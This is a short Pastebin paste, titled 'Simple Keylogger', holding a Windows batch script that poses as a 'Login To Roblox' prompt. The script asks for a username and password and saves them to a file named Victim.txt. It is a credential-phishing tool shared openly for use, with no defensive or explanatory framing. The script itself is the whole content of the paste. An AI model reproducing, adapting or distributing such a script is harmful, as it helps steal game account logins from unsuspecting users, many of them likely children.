Advertisement
PerfectShowsYT

The Code ! Simple Keylogger

Dec 18th, 2017
1,104
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.20 KB | None | 0 0
  1. echo off
  2. color 0a
  3. title Login To Roblox
  4. cls
  5. echo Please Enter Your Username And Password.
  6. echo.
  7. echo.
  8. set /p user=username:
  9. set /p pass=password:
  10. cls
  11. echo username=%user% password=%pass% > Victim.txt
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement